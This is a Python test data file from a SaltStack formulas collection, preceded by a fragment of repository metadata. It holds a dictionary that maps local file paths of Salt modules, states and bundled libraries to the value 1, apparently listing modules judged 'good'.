] | 1 | 2015-01-06T10:54:00.000Z | 2015-01-06T10:54:00.000Z | tests/good_modules.py | h4ck3rm1k3/salt-formulas | 8b0265faa64fa1d2a4149ce9aeb279e3861150fd | [
"CC0-1.0"
] | 4 | 2015-01-19T16:39:48.000Z | 2020-11-04T05:52:02.000Z | good_modules={'/mnt/data/home/mdupont/experiments/salt-formulas/AFPy_salt-fr/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/linux_lvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/parted': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/parted_free_disks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/lvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Cantemo_python27-saltstack-formula/python27/files/ez_setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/bin/nacl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/opt/graphite/webapp/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/usr/local/bin/celery_task_queues': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/usr/local/bin/check_elasticsearch': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/usr/local/bin/check_rackspace_cloudfiles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/DanielBryan_salt-state-graph/salt-state-graph': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/FleetingClouds_SaltStackToolSet/gdata_oerp_pump/srv/salt/gdata_oerp_pump/creds_oa': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Gohan_salt-state/tools/python27/get-pip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Grokzen_salty-windows/states/winreg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Ins1ne_salt-states/salt/_modules/deploy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Ins1ne_salt-states/salt/_runners/carbonmon': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Ins1ne_salt-states/salt/app/database_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/JustinCarmony_vagrant-cloud/saltstack/salt/_modules/zombie': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/commands/mixins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/cred': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/db': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/format': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/salt_ext_modules/pillar/pepperstack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KrisSaxton_salt-ldap/auth/ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KrisSaxton_salt-ldap/modules/ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KrisSaxton_salt-ldap/pillar/pillar_ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/device_descriptor': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/publisher': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/sensed_event': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server/import_fixer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server/util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_sensor': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/temperature/tempy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/errors': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/unixconn/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/utils/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/errors': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/ssladapter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/ssladapter/ssladapter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/unixconn/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/mock': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/certs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/hooks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/big5freq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/chardetect': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/compat': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/constants': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/euckrfreq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/euctwfreq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/gb2312freq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/jisfreq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langbulgarianmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langcyrillicmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langgreekmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langhebrewmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langhungarianmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langthaimodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/contrib': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages/ordered_dict': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages/six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages/ssl_match_hostname': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/structures': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/websocket': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/common': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/linux': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/meta': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/windows': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/auto': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/pam': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/stormpath_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/client/ssh/shell': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/client/ssh/wrapper/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/client/ssh/wrapper/pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/cloud/clouds': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/cloud/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/crypt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/ext': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains/external_ip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains/extra': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains/opts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/loader': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/handlers/logstash_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/handlers/sentry_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/mixins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/cp': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/daemontools': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/data': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/debconfmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/defaults': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/dpkg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/event': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/extfs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/key': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/mine': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/pkgutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/ps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/puppet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/rbenv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/ret': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/rpm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/rvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/shadow': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/sysmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/highstate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/json_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/key': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/nested': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/no_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/no_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/overstatestage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/pprint_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/raw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/txt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/virt_query': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/yaml_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/overstate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/payload': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/cmd_json': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/cmd_yaml': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/cobbler': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/django_orm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/git_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/hiera': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/libvirt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/mongo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/mysql': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/pillar_ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/puppet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/jinja': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/json': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/mako': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/py': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/wempy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/cloud': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/error': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/fileserver': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/git_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/launchd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/mine': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/chef': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/fs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/gem': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/git': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/group': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/host': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/locale': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/lvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/module': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/mount': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/npm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/pecl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/puppet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/quota': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/rvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/saltmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/stateconf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/supervisord': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/timezone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/virtualenv_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/syspaths': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/template': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/transport': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/atomicfile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/context': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/debug': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/decorators': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/dictupdate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/error': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/filebuffer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/gzip_util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/ipaddr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/mako': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/master': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/minions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/nb_popen': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/odict': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/process': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/reclass': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/schedule': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/templates': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/thin': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/timed_subprocess': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate/net': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate/path': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate/user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/verify': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/virt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/vops': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/vt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/xmlutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/error': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/file_roots': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/pillar_roots': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/NVSeismoLab_antelope-formula/_modules/antelope': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/NVSeismoLab_antelope-formula/antelope/python/files/sitecustomize': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Pexeso_pypack-formula/_states/pypack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Pexeso_pypack-formula/_states/pypack/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dawdaw/dawdaw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dawdaw/dawdaw/magic': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/dishes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/dishes/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/formulas': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/formulas/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/formulas/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/RobSpectre_salt-states/sentry/sentry.conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/RobSpectre_salt-states/votr/initialize_votr_database': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SS-archive_salt-states/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SS-archive_salt-states/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SS-archive_salt-states/saltsrc/py_render': 1,
